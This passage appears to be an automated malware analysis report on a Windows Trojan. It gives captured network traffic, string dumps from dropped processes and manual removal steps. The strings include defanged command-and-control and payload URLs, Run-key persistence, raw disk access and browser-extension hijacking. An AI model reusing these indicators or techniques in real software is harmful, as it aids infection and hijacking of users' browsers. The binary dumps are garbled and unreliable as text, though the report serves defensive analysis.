or_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{di
splay:inline-block;height:54px;width:150px}.  </style>.  <a h
ref=//VVV.google.com/><span id=logo aria-label=Google></sp
an></a>.  <p><b>404.</b> <ins>Tha
<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAisW18hq2CY HTTP/1.1

Cache-Control: max-age = 345600

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 404 Not Found

Date: Tue, 17 Jan 2017 11:53:32 GMT

Content-Type: text/html; charset=UTF-8

Server: ocsp_responder

Content-Length: 1668

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN
<!DOCTYPE html>.<html lang=en>.  <meta charset=utf-8>
;.  <meta name=viewport content="initial-scale=1, minimum-scale=1, 
width=device-width">.  <title>Error 404 (Not Found)!!1</ti
tle>.  <style>.    *{margin:0;padding:0}html,code{font:15px/2
2px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body
{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px
}* > body{background:url(//VVV.google.com/images/errors/robot.png) 
100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:h
idden}ins{color:#777;text-decoration:none}a img{border:0}@media screen
 and (max-width:772px){body{background:none;margin-top:0;max-width:non
e;padding-right:0}}#logo{background:url(//VVV.google.com/images/brandi
ng/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:
-5px}@media only screen and (min-resolution:192dpi){#logo{background:u
rl(//VVV.google.com/images/branding/googlelogo/2x/googlelogo_color_150
x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//VVV.googl
e.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}
@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{backgr
ound:url(//VVV.google.com/images/branding/googlelogo/2x/googlelogo_col
or_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{di
splay:inline-block;height:54px;width:150px}.  </style>.  <a h
ref=//VVV.google.com/><span id=logo aria-label=Google></sp
an></a>.  <p><b>404.</b> <ins>Tha
<<< skipped >>>

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.msocsp.com

HTTP/1.1 200 OK

Date: Tue, 17 Jan 2017 11:52:51 GMT

Content-Type: application/ocsp-response

Content-Length: 1820

Connection: keep-alive

Set-Cookie: __cfduid=d71c5021a5e2354d7ffb946566ae8df3e1484653971; expires=Wed, 17-Jan-18 11:52:51 GMT; path=/; domain=.msocsp.com; HttpOnly

Last-Modified: Tue, 17 Jan 2017 10:53:53 GMT

Expires: Sat, 21 Jan 2017 10:53:53 GMT

ETag: "53ac0ef1d14aabd361c099385f3f5895cc864315"

Cache-Control: max-age=10800,public,no-transform,must-revalidate

X-Cache: EXPIRED

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 32299a7b43804044-SOF
0..........0..... .....0......0...0..........<.|7...@N6p.I.e|..2017
0117105353Z0..0..0L0... ........&."f........{5.....t..Q.$&..h"W.& ;Fb.
{.....Z...u.I@W.Ws......u....20170117105353Z....20170121105353Z."0 0..
. .....0......20160118105353Z0...*.H..............S.Uv.o.8w...x...N..A
1.|...pDwm.[..|s.-....R@...H..`.q.Q$w.=*......s.,Z..$.La.......2_.....
 R.f.e...M.J8.Z,..!9QK5...l..CP.C#...K.BI..\?...{..n.."......G...n....
P.V.*..U...S........4.^.'../...y.6~..i.8m;g>..n.'.....B.\u..7...~..
.......D.E.C.1...>..F.a.........0...0...0..........Z.....p.j... ...
...0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redm
ond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0...U....M
icrosoft IT SSL SHA20...170110005502Z..170326005502Z0!1.0...U....Shoul
d be ignore by CA0.."0...*.H.............0...........&!(..$.K...."=f..
..x.d.._s.....j....9`..l.Z..............^f..u......-e.&.bG.(i.Q.......
....bEy...^7A...A..c....CF-&...e.7..7F....."..w...y.:..`.w{~..D.x*....
...x3Os......q...... S.fB .ig.....L..3......4E..}..7...M....e ...6.M.O
.....<5:......r.....]..A.5........0..0...U..........<.|7...@N6p.
I.e|0...U.#..0...Q.$&..h"W.& ;Fb.{...0...U...........0=.. .....7...00.
.& .....7.....M..........}...t.O..........d...0...U.%..0... .......0..
. .....7....0.0... .......0... .....0......0...*.H................s..C
ht.W..j...C.._t/..Y.b..\u~.g..n7...}.%.`~..^...#{.'.T..3....4!..4U.=..
..}.6.G..W.0..d .o..|uX.........k.`......,...3.....L..4-......V.../f=o
.A?a<JL.....9..(.Y.....,....k...6.A..JN$.t.\...$B.CY..;.....S..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

Bv.SCv=kAv

wininet.dll

ws2_32.dll

IPHLPAPI.DLL

oleaut32.dll

ole32.dll

OleAut32.dll

kernel32.dll

ShellExecuteA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

mm.exe

@.reloc

operator

GetProcessWindowStation

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GET %s HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5

Host: %s

,5-%d

Range:bytes=0-%s

POST /?%d HTTP/1.1

Content-Length: %d

X-%c: %c

hXXp://

VVV.%s

Windows 8

Windows 7

Windows Vista

Windows 2003

Windows XP

Windows 2000

Windows NT

Windows 2008

%d * %dMHz

dnsapi.dll

KERNEL32.dll

Software\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

.temp.fortest

\WindowsUpdate

F:\Projects\7

\20150606\Server\Release\Server.pdb

WS2_32.dll

DNSAPI.dll

WinExec

GetProcessHeap

GetCPInfo

USER32.dll

RegOpenKeyA

RegCloseKey

ADVAPI32.dll

ShellExecuteExA

SHELL32.dll

SHLWAPI.dll

zcÁ

MFC42.DLL

MSVCRT.dll

_acmdln

OLEAUT32.dll

function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);

CWebBrowser2

88.200jh.com

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

0 0$0(0,00040~0

;*;/;;;@;_;

2 2$2024282

hXXp://VVV.ip138.com/ips.asp?ip=

hXXp://VVV.ip138.com/ip2city.asp

tem.vbs

fso.DeleteFile("

Set fso = CreateObject("Scripting.FileSystemObject")

Wscript.Sleep(1000)

hXXp://183.60.200.160:8080/yy.txt

</url>

<url>

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

hXXp://VVV.900cpa.cc:8080/tongji.php?ver=hongchen&mac=

{4590f811-1d3a-11d0-891f-00aa004b2e24}

{dc12a687-737f-11cf-884d-00aa004b2e24}

\\.\PhysicalDrive0

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

user32.dll

RASAPI32.dll

GetWindowsDirectoryA

GetKeyState

GetViewportOrgEx

GDI32.dll

WINMM.dll

WINSPOOL.DRV

RegOpenKeyExA

COMCTL32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

RegCreateKeyExA

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

Via: cache20.l2cm12[0,304-0,H], cache14.l2cm12[0,0], kunlun9.cn133[0,200-0,H], kunlun10.cn133[0,0]

X-Cache: HIT TCP_MEM_HIT dirn:9:815987160

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

location.href="hXXp://VVV.ip138.com/ips138.asp"   location.search;

<a href="hXXp://VVV.ip138.com/ips138.asp">IP

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

{8856F961-340A-11D0-A96B-00C04FD705A2}

1, 0, 0, 1

BrowserServer.EXE

(*.*)

tqgb.exe_2772:

.text

`.rdata

@.data

.rsrc

@.reloc

@Ew.AEw

Av.SCv

operator

GetProcessWindowStation

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GET %s HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5

Host: %s

,5-%d

Range:bytes=0-%s

POST /?%d HTTP/1.1

Content-Length: %d

X-%c: %c

hXXp://

VVV.%s

Windows 8

Windows 7

Windows Vista

Windows 2003

Windows XP

Windows 2000

Windows NT

Windows 2008

%d * %dMHz

dnsapi.dll

KERNEL32.dll

Software\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

.temp.fortest

\WindowsUpdate

F:\Projects\7

\20150606\Server\Release\Server.pdb

WS2_32.dll

IPHLPAPI.DLL

DNSAPI.dll

WinExec

GetProcessHeap

GetCPInfo

USER32.dll

RegOpenKeyA

RegCloseKey

ADVAPI32.dll

ShellExecuteExA

SHELL32.dll

SHLWAPI.dll

zcÁ

MFC42.DLL

MSVCRT.dll

_acmdln

ole32.dll

OLEAUT32.dll

function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);

CWebBrowser2

88.200jh.com

C:\Windows\WindowsUpdate\tqgb.exe

C:\Windows\WindowsUpdate

tqgb.exe

xblkvtmnfxw.exe

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

0 0$0(0,00040~0

;*;/;;;@;_;

2 2$2024282

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

{8856F961-340A-11D0-A96B-00C04FD705A2}

1, 0, 0, 1

BrowserServer.EXE

mmc.exe_3004:

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

Bv.SCv=kAv

kernel32.dll

user32.dll

ntdll.dll

psapi.dll

shell32.dll

advapi32.dll

ShellExecuteA

RegCloseKey

RegCreateKeyA

RegOpenKeyA

%WinDir%\Media\McIe.wav

%WinDir%\Media\Mcfg.wav

%WinDir%\syswow64\dllhost.exe

%WinDir%\st.dat

%WinDir%\star.dat

%WinDir%\Media\

as.bat

explorer.exe

winlogon.exe

360tray.exe

minibaidu.exe

@Dqc.exe

MIJ.exe

27e.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_CONFIG

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

ole32.dll

__MSVCRT_HEAP_SELECT

GetProcessHeap

WinExec

GetWindowsDirectoryA

KERNEL32.dll

GetKeyState

USER32.dll

GetViewportOrgEx

GDI32.dll

WINMM.dll

WINSPOOL.DRV

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

COMCTL32.dll

oledlg.dll

WS2_32.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

RegCreateKeyExA

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

1.1.3

;3 #>6.&

'2, / 0&7!4-)1#

(*.htm;*.html)|*.htm;*.html

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

.PAVCOleDispatchException@@

zcÁ

5a0c4e0be2d4b521.exe

C:\Windows\system32\mmc.exe

#include "l.chs\afxres.rc" // Standard components

2"&,\45>

*.**)

.uy}"

(*.*)

jyueservice.exe_2572:

.text

`.rdata

@.data

.rsrc

@.reloc

SPSSSSSSh

Bv.SCv|

0123456789abcdef\\.\PhysicalDrive%d

ERROR: Could not open IDE21201.VXD file

\\.\IDE21201.VXD

\\.\Scsi%d:

XXXXXX

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

GetProcessWindowStation

operator

%s.log

OpenSCManager failed, error code = %d

Failed to create service %s, error code = %d

Service %s installed

OpenService failed, error code = %d

Failed to delete service %s

Service %s removed

d/d/d, d:d:d

ControlService failed, error code = %d

StartService failed, error code = %d

StartServiceCtrlDispatcher failed, error code = %d

RegisterServiceCtrlHandler failed, error code = %d

SetServiceStatus failed, error code = %d

Unrecognized opcode %d

"%s" %s

Start process SUCCEEDED: '%s'

Failed to start program '%s', error code = %d

WTSAPI32.dll

USERENV.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

WinHttpReceiveResponse

WinHttpSetTimeouts

WinHttpSetOption

WinHttpGetIEProxyConfigForCurrentUser

WinHttpSendRequest

WinHttpWriteData

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpReadData

WinHttpAddRequestHeaders

WINHTTP.dll

SHLWAPI.dll

IPHLPAPI.DLL

GetCPInfo

PeekNamedPipe

GetProcessHeap

zcÁ

C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jyueservice.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jyueservice.log

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

2024282<2

> >$>(>,>0>4>8><>@>

6 6(60646

succ %s line:%d, error:%d

LX

#{ad498944-762f-11d0-8dcb-00c04fc3358c}

nKERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

WinHttpClient

hXXp://

VVV.jyrili.com

DownLoadUrl new WinHttpClient failed!

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

DownLoadUrl SendHttpRequest failed and request Url is:

DownLoadUrl download failed!

DownLoadUrl write file failed and file is:

DownLoadUrl open file failed and file is:

"url":

RIBridage.exe

/client.do/?method=svcupdate&version=

4.0.3.0

\svcupdate.exe

RLServic.exe

guide.exe_3788:

.text

`.rdata

@.data

.rsrc

@.reloc

xSSSh

FTPjKS

FtPj;S

C.PjRV

Dw.AEw1

Bv.SCv

\\.\PhysicalDrive%d

ERROR: Could not open IDE21201.VXD file

\\.\IDE21201.VXD

\\.\Scsi%d:

XXXXXX

Visual C   CRT: Not enough memory to complete call to strerror.

GetProcessWindowStation

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

ddd

\rili.ini

' ).;<52

jywebHelper.dll

jywebHelper

{ "startup_urls":

session.startup_urls

startup_urls

session.restore_on_startup

hXXp://

/client.do/?method=

&key=

/client.do/?

\baseData.ini

VVV.jyrili.com

4.0.3.0

D:\develop\163rili\RLProject\bin\Release\guide.pdb

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

RegDeleteKeyW

ADVAPI32.dll

SHFileOperationW

ShellExecuteW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetTimeouts

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpGetIEProxyConfigForCurrentUser

WinHttpGetProxyForUrl

WinHttpWriteData

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WINHTTP.dll

SHLWAPI.dll

PSAPI.DLL

IPHLPAPI.DLL

GetCPInfo

GetProcessHeap

zcÁ

.?AVCChromeInstallBase@@

.?AVCChromeInstall@@

.?AVCChrome360Install@@

.?AVCChrome2345Install@@

cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

2,2[2`2^3

6*6<6_6}6

3 3$3(3,3

: :$:8:<:

> >$>(>,>0>4>

<(<0<<<`<

> >(>0><>`>

>$>@>`>|>

3$3,343@3

1 1$1(101

succ %s line:%d, error:%d

Explorer.exe

LX

#{ad498944-762f-11d0-8dcb-00c04fc3358c}

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

gWinHttpClient

DownLoadUrl new WinHttpClient failed!

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

DownLoadUrl SendHttpRequest failed and request Url is:

DownLoadUrl download failed!

DownLoadUrl write file failed and file is:

DownLoadUrl open file failed and file is:

fixfunction.dll

4.0.3

SOFTWARE\MozillaPlugins\@jyrili.com/yzwebAssist

jyrili.exe

uninst.exe

URLInfoAbout

{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}

RIBridage.exe

{157053CE-EAFA-4823-BFE2-7D5F37A07C24}

{B61A7628-1390-433A-A852-601F4A15A28D}

update.exe

com.rili.chrome.namsg.yunzhou

chromeNativeClient\com.rili.chrome.namsg.yz-win.json

extensions\jychromeex.crx

\extensions\chrome\

QQBrowser.exe

\extensions\jychromeex.crx

\fixfunction.dll

\config\rili.ini

ljson_reader.cpp

json_value.cpp

json_writer.cpp

childValues_.size() == size

int(indentString_.size()) >= indentSize_

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

\chrome.exe

\Google\Chrome\User Data

\Google Chrome

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

\Chrome\User Data

2345chrome

\resources.pak

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

{A520A1A4-1780-4FF6-BD18-167343C5AF16}

Shell32.dll

setting.json

SOFTWARE\Google\Chrome\NativeMessagingHosts\

Software\Google\Chrome\Extensions\

sec_setting.json

\Chrome\Extensions\

Software\2345Chrome\Extensions\

\config\baseData.ini

Assertion failed: %s, file %s, line %d

chrome

C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\guide.exe

jyrili.exe_552:

.text

`.rdata

@.data

.rsrc

@.reloc

8%u:j

SPSSSSSSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

w.SCv%

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

urlLabel

<!--%s-->

&#xX;

</%s>

%s='%s'

%s="%s"

<![CDATA[%s]]>

standalone="%s"

encoding="%s"

version="%s"

Visual C   CRT: Not enough memory to complete call to strerror.

GetProcessWindowStation

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

\\.\PhysicalDrive%d

ERROR: Could not open IDE21201.VXD file

\\.\IDE21201.VXD

\\.\Scsi%d:

XXXXXX

\baseData.ini

VVV.jyrili.com

4.0.3.0

RegOpenKeyTransactedW

ddd

hXXp://

/client.do/?method=

\rili.ini

GetProcessHeap

KERNEL32.dll

USER32.dll

RegOpenKeyExW

RegCreateKeyExW

RegDeleteKeyW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

ShellExecuteA

SHELL32.dll

OLEAUT32.dll

COMCTL32.dll

GDI32.dll

WinHttpCloseHandle

WinHttpReadData

WinHttpQueryDataAvailable

WinHttpQueryHeaders

WinHttpReceiveResponse

WinHttpWriteData

WinHttpGetProxyForUrl

WinHttpGetIEProxyConfigForCurrentUser

WinHttpSendRequest

WinHttpAddRequestHeaders

WinHttpSetOption

WinHttpOpenRequest

WinHttpConnect

WinHttpCrackUrl

WinHttpSetTimeouts

WinHttpOpen

WINHTTP.dll

GdiplusShutdown

gdiplus.dll

GetCPInfo

IPHLPAPI.DLL

zcÁ

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

7?8J8q8Ÿ9d9&:8:

> ?$?(?,?

>,?0?4?8?<?@?}?

45`5~5

2&2/242<2

1%2U2

8 8$8(8,8084888<8@8

5 5<5@5\5`5

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

DownLoadUrl download failed!

DownLoadUrl open file failed and file is:

DownLoadUrl write file failed and file is:

DownLoadUrl SendHttpRequest failed and request Url is:

DownLoadUrl new WinHttpClient failed!

//resource//arrow_right.png

//resource//arrow_left.png

//resource//comboxBk.png

\resource\mainBk.png

\xmlconfig\riliclient.xml

/Resource/DirectUI/scrollBar.bmp

/Resource/DirectUI/srollBk.bmp

/Resource/DirectUI/scrollArrowUp.bmp

/Resource/DirectUI/scrollArrowDown.bmp

GDIPlusInit::~GDIPlusInit:GdiplusShutdown.

\resource\directUI\scrollBar.bmp

\resource\directUI\srollBk.bmp

\resource\directUI\scrollArrowUp.bmp

\resource\directUI\scrollArrowDown.bmp

d:\devleop\yzcommon\source\xmlimpl\tinyxml\tinystr.h

tinyxml\tinyxml.cpp

sentinel.prev == &sentinel

sentinel.next == &sentinel

cursor.col >= -1

cursor.row >= -1

tinyxml\tinyxmlparser.cpp

strlen( entity[i].str ) == entity[i].strLength

d:\devleop\yzcommon\source\xmlimpl\tinyxml\tinyxml.h

nKERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

succ %s line:%d, error:%d

LX

#{ad498944-762f-11d0-8dcb-00c04fc3358c}

\config\baseData.ini

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

{A520A1A4-1780-4FF6-BD18-167343C5AF16}

Shell32.dll

WinHttpClient

Advapi32.dll

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

\config\rili.ini

ljson_reader.cpp

json_value.cpp

Assertion failed: %s, file %s, line %d

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\78017\jyrili.exe

Replace%Select the entire document

Arrange Icons/Arrange windows so they overlap

Cascade Windows5Arrange windows as non-overlapping tiles

Tile Windows5Arrange windows as non-overlapping tiles

Tile Windows(Split the active window into panes

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   tqgb.exe:2772
   WScript.exe:1884
   src2011.tmp:3204
   src2011.exe:3012
   1819.exe:2816
   rundll32.exe:2060
   %original file name%.exe:2948
   mm.exe:2928
   regsvr32.exe:3384
   regsvr32.exe:3208
   xPiSs.exe:3932
   mmc.exe:3004
   guide.exe:2212
   guide.exe:3788
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.d (438 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-FAS25.tmp (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-CTDCH.tmp (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-MJGBG.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\is-0VP5H.tmp (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\ISTask.dll (687 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-J28MR.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-01FTN.tmp (57 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\en\is-VBM9M.tmp (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-UHB8T.tmp (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-NCP50.tmp (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-20T3A.tmp (520 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-02OSJ.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-C4M25.tmp (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-TKHO0.tmp (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-ILCVQ.tmp (1 bytes)
